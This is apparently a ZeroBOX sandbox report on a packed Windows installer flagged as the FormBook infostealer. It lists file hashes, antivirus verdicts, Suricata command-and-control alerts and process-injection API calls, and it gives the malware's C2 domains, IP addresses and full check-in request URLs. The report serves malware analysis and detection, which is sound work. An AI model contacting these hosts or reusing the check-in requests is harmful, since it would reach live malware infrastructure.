Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 29, 2023, 10:34 a.m.	March 29, 2023, 10:37 a.m.

Size	293.1KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5	`7c85964484c4e3471124dd4dd5ef34df`
SHA256	`ab8fa0dda1daa490598653ad71df25b26af3dc5b54434c68bccdff3eda13f96e`
CRC32	`EE468DF7`
ssdeep	`6144:/Ya6ecZBUdAW0HmqIUjrBxEsjolC06nbGY9kbdVMZYIOS+Fgoka:/YQnd+GaLEsfnbGKkDax5+Vka`
Yara	UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature

Name	Response	Post-Analysis Lookup
www.ldkj9qq.vip
www.reinifix.net	CNAME reinifix.net A 81.169.145.82	81.169.145.82
www.hyrxo.win	A 103.188.120.191 A 103.24.53.30 CNAME jh03-site-21.cdn-ng.net CNAME hv12s8212.ledetipe.com	103.24.53.30
www.1cweb.online	A 85.15.189.140	85.15.189.140
www.cortinasagave.store

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 81.169.145.82:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 81.169.145.82:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 81.169.145.82:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 85.15.189.140:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 103.188.120.191:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 29, 2023, 10:34 a.m.		1	1	0

section

.ndata

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.hyrxo.win/gn35/?_DKdKJa=Px4xbTIrKwyUbcbV7Sa4MFdwj6MuY8cQxHdgLkOTvjLt2qFRB4E1b+Ud0Zeqp82x10XYRgaJ&QZ3=ehux_8Xh401XOrt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.1cweb.online/gn35/?_DKdKJa=GGTZroRoL1BXwM3MXiLpR9yEKm8KXFWUPJQo2rBdJCC/pgm2ifzqsBXvCGkh1lxdt+0GDl+4&QZ3=ehux_8Xh401XOrt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.reinifix.net/gn35/?_DKdKJa=/oLJKsvMxImT2IdLjwC7RXLGQP6Il4Qvv7Du59jzs3EP6cW1xcwdDxVo3LxxLXdrTKNn2jpT&QZ3=ehux_8Xh401XOrt

request	GET http://www.hyrxo.win/gn35/?_DKdKJa=Px4xbTIrKwyUbcbV7Sa4MFdwj6MuY8cQxHdgLkOTvjLt2qFRB4E1b+Ud0Zeqp82x10XYRgaJ&QZ3=ehux_8Xh401XOrt
request	GET http://www.1cweb.online/gn35/?_DKdKJa=GGTZroRoL1BXwM3MXiLpR9yEKm8KXFWUPJQo2rBdJCC/pgm2ifzqsBXvCGkh1lxdt+0GDl+4&QZ3=ehux_8Xh401XOrt
request	GET http://www.reinifix.net/gn35/?_DKdKJa=/oLJKsvMxImT2IdLjwC7RXLGQP6Il4Qvv7Du59jzs3EP6cW1xcwdDxVo3LxxLXdrTKNn2jpT&QZ3=ehux_8Xh401XOrt

Time & API	Arguments	Status
NtAllocateVirtualMemory March 29, 2023, 10:34 a.m.	process_identifier: 2132 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01d50000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2023, 10:34 a.m.	process_identifier: 2132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01d70000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 29, 2023, 10:34 a.m.	process_identifier: 2184 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

file	C:\Users\test22\AppData\Local\Temp\gpphbrp.exe
file	C:\Users\test22\AppData\Local\Temp\hwjgf.bat

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 29, 2023, 10:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2132 called NtSetContextThread to modify thread in remote process 2184
NtSetContextThread March 29, 2023, 10:34 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4321744 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000f8 process_identifier: 2184	1	0	0

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Agent.tshg
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.66137268
FireEye	Generic.mg.7c85964484c4e347
McAfee	Trojan-FUUG!7C85964484C4
VIPRE	Gen:Variant.Nemesis.1797
Sangfor	Suspicious.Win32.Save.ins
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanSpy:Application/FormBook.cc0b7ef8
Arcabit	Trojan.Nemesis.D705
Cyren	W32/Injector.BIA.gen!Eldorado
Symantec	Packed.NSISPacker!g14
ESET-NOD32	a variant of Win32/Injector.ESVA
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan.Win32.Strab.gen
BitDefender	Trojan.GenericKD.66137268
Avast	Win32:PWSX-gen [Trj]
Emsisoft	Trojan.GenericKD.66137268 (B)
TrendMicro	TROJ_GEN.R002C0PCS23
McAfee-GW-Edition	BehavesLike.Win32.Generic.dc
Trapmine	malicious.moderate.ml.score
Sophos	Generic ML PUA (PUA)
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Infostealer.Formbook
Avira	HEUR/AGEN.1337962
MAX	malware (ai score=80)
Xcitium	Malware@#1o9i3f53oc15z
Microsoft	Trojan:Script/Phonzy.C!ml
GData	Win32.Trojan.Agent.YY782N
Google	Detected
AhnLab-V3	Trojan/Win.Agent.C5382526
ALYac	Gen:Variant.Nemesis.1797
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002C0PCS23
Rising	Trojan.Nsisinject!8.11178 (TFE:5:Y2laFjB9pNF)
Ikarus	Trojan-Spy.FormBook
Fortinet	W32/ShellcodeRunner.CA!tr
AVG	Win32:PWSX-gen [Trj]

vbc.exe